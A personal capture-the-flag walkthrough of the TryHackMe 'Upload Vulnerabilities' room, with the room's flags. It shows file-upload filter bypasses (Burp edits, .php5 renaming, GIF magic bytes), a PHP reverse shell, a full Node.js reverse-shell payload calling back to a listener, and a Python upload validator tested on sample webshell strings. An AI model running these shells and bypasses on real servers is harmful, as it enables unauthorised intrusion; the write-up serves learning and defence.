TryHackMe – Upload Vulnerabilities

The following write up is posted here to show how I worked through this on the TryHackMe platform to learn how to gain access to a webserver.

Task 1 – Getting Started

Start the VM and make the changes to your hosts file outlined in task 1.

cd ..
cd etc
sudo nano hosts

Copy and paste the information from task 1.

Ctrl-X to exit nano; when prompted hit Y to save, then Return to save the file as hosts.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 2 Introduction

Read the introduction.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 3: General Methodology

Read the information here and proceed.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 4: Overwriting Existing Files

Q1: What is the name of the image file which can be overwritten?

Right-click and choose View Page Source or Inspect. In the body there is only one image file:

A1: mountains.jpg

Q2: Overwrite the image. What is the flag you receive?

Download any image from the internet and save it as “mountains.jpg”. Then upload this to the site using the buttons on the site.

A2: THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5}

Task 5: Remote Code Execution

Q1: Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?

Run gobuster (directory mode against the shell host, medium dirbuster wordlist):

gobuster dir -u http://shell.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

When I ran this on the attackbox it took a long time.

A1: /resources

Q2: Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?

This one was a little harder. I had to restart the VM because it wasn’t allowing me to upload anymore.

Copy the PHP reverse shell that is included in Kali:

cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php

Change the IP listed there to your attackbox IP. Save and exit.

Now upload that to: http://shell.uploadvulns.thm/

Before doing anything else, start a netcat listener:

nc -nlvp 1234

Now go to the resources page: http://shell.uploadvulns.thm/resources

Verify your shell.php is there. Click it.

Now you should have access to the machine in the console you have netcat running in. Type the below in that console:

cd /var/www
ls
cat flag.txt

A1: THM{YWFhY2U3ZGI4N2QxNmQzZjk0YjgzZDZk}

Task 6: Filtering

Read the content of task 6.

Q1: What is the traditionally predominant server-side scripting language?

Hint: we used it in the last task.

A1: php

Q2: When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

Answer is in the reading of task 6.

A2: whitelist

Q3: [Research] What MIME type would you expect to see when uploading a CSV file?

Google it.

A3: text/csv

Task 7: Bypassing Client-Side Filtering

OK, we need to use Burp Suite for this one. We need to bypass the JavaScript that stops us from uploading PHP files.

We are going to run gobuster again on this new site to see where the uploaded files go:

gobuster -u http://java.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Mine was still running, but I already saw what I wanted: “images”.

Launch Burp Suite and enable its proxy in the browser.

Go to http://java.uploadvulns.thm/

You should see the request in Burp Suite. Right-click, choose Do intercept > Response to this request, and delete the JavaScript from the response.

Press forward.

Now go back to the site and upload the shell file.

Start netcat:

nc -nlvp 1234

Go to http://java.uploadvulns.thm/images

and click on the shell file.

Check your netcat console and you should see you’re in!

Q1: What is the flag in /var/www/?

To capture the flag use:

cat /var/www/flag.txt

A1: THM{NDllZDQxNjJjOTE0YWNhZGY3YjljNmE2}

Task 8: Bypassing Server-Side Filtering: File Extensions

This was very frustrating. I kept running into an issue with the VM.

When trying to upload, I kept getting the message: “File must be chosen before being uploaded. Type “help” for syntax.” To resolve this issue I had to restart the VM and change my hosts file again.

Back to the task at hand. In order to get the file uploaded you have to change the file extension. Acceptable file extensions for PHP files also include .php5. So I renamed the file to rshell.php5, just in case “shell” sets anything off.

This works. Run gobuster to find the directories:

gobuster -u http://annex.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here we find /privacy.

After finally getting the file uploaded, I can find it in http://magic.uploadvulns.thm/privacy

Start netcat as usual:

nc -nlvp 1234

You should have access now.

Q1: What is the flag in /var/www/?

Find the flag:

cat /var/www/flag.txt

A1: THM{MGEyYzJiYmI3ODIyM2FlNTNkNjZjYjFl}

Task 9: Bypassing Server-Side Filtering: Magic Numbers

Start with another gobuster scan:

gobuster -u http://magic.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Looks like /graphics will be our directory this time.

We are going to make a copy of shell.php and call it magic.php:

cp shell.php magic.php

Now we need to change magic.php so that the server thinks it is a GIF.

Open magic.php in nano and add AAAAAA at the top (six placeholder bytes to overwrite). Save.

Install hexeditor:

apt install ncurses-hexedit

Run it on magic.php:

hexeditor magic.php

Change the first six bytes (the AAAAAA you added) to the GIF87a magic number:

47 49 46 38 37 61

Upload the file. Start netcat:

nc -nlvp 1234

Directory listing is forbidden, so we have to type the URL of the uploaded file in directly:

http://magic.uploadvulns.thm/graphics/magic.php

Q1: Grab the flag from /var/www/

You should be in. Cat the flag:

cat /var/www/flag.txt

A1: THM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}
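The filters in Tasks 6, 8 and 9 fail because they check one thing each: a blacklist that misses .php5, or magic bytes alone. Below is an added example (not from the room or the author) of the server-side validation a defender would want: size, a whitelist on the real (last) extension, magic bytes that must match that extension, and a server-chosen random filename. Function and constant names are my own.

```python
import os
import secrets

# Whitelist: extension -> required leading bytes. Anything else (.php, .php5,
# .phtml, ...) is rejected outright; "GIF8" covers both GIF87a and GIF89a.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def validate_upload(filename, data, max_size=2 * 1024 * 1024):
    """Return (ok, reason_or_safe_name).

    All checks run server-side, so stripping client-side JavaScript (Task 7)
    does not help. The saved name never comes from the client.
    """
    if not data or len(data) > max_size:
        return False, "bad size"
    base = os.path.basename(filename)
    # Split on every dot so "shell.php.jpg" and "rshell.php5" are judged
    # on the suffix the web server would actually use.
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, "extension .%s not whitelisted" % ext
    # Magic number must match the whitelisted extension, not just "some image".
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match extension"
    # Random server-chosen name with the validated extension (Task 11 style).
    return True, "%s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    # Constructed sample inputs mirroring the room's bypass attempts.
    samples = [
        ("rshell.php5", b"<?php system($_GET['c']); ?>"),
        ("magic.php", b"GIF87a<?php system($_GET['c']); ?>"),
        ("shell.php.jpg", b"<?php system($_GET['c']); ?>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for name, body in samples:
        print(name, "->", validate_upload(name, body))
```

A file with a real GIF header and a .gif extension still passes, exactly the Task 9 polyglot, so the upload directory must also be served without script execution (and ideally from outside the web root) rather than relying on validation alone.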

Task 10: Example Methodology

Read the information in the task.

Q1: No Answer needed.

A1: No Answer needed.

Task 11: Challenge

Run gobuster first:

gobuster -u http://jewel.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The upload directory is probably going to be /content.

This server renames files once they are uploaded, so we first need to see what is already there, using another gobuster scan:

gobuster -u http://jewel.uploadvulns.thm/content/ dir -x jpg --wordlist ~/Downloads/vuln.txt

The vuln.txt here is from the task files you downloaded. This shows us what is in the content folder before we upload, so any new file afterwards will be the one we added.

Create a new file:

nano shell.jpg

and paste this code in (the address and port are the listener's; 10.0.0.1 is the placeholder from the task, and the port matches the netcat listener below):

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Now we need to run Burp Suite and stop when we see upload.js being fetched. Like before, right-click, choose Do intercept > Response to this request, then forward until we get the JavaScript. Take out the three sections of code that check the file size, magic number and file extension.

After the file is uploaded we run the same gobuster command to see which jpg is new.

I now see a new file, DHR.jpg (your jpg filename will be different).

Now start netcat:

nc -nlvp 443

We also know from the very first gobuster scan that there is an /admin page, so we can use that page to run our shell:

http://jewel.uploadvulns.thm/admin

Here we type in:

../content/DHR.jpg

Netcat should pick up the connection. Then, same as before, run:

cat /var/www/flag.txt

Q1: Hack the machine and grab the flag from /var/www/

A1: THM{NzRlYTUwNTIzODMwMWZhMzBiY2JlZWU2}

Task 12: Conclusion

Q1: No answer needed.

A1: No answer needed.

That one was hard. If you run into issues, try terminating the VM and restarting (remember to change your hosts file).

Also here are some good resources:
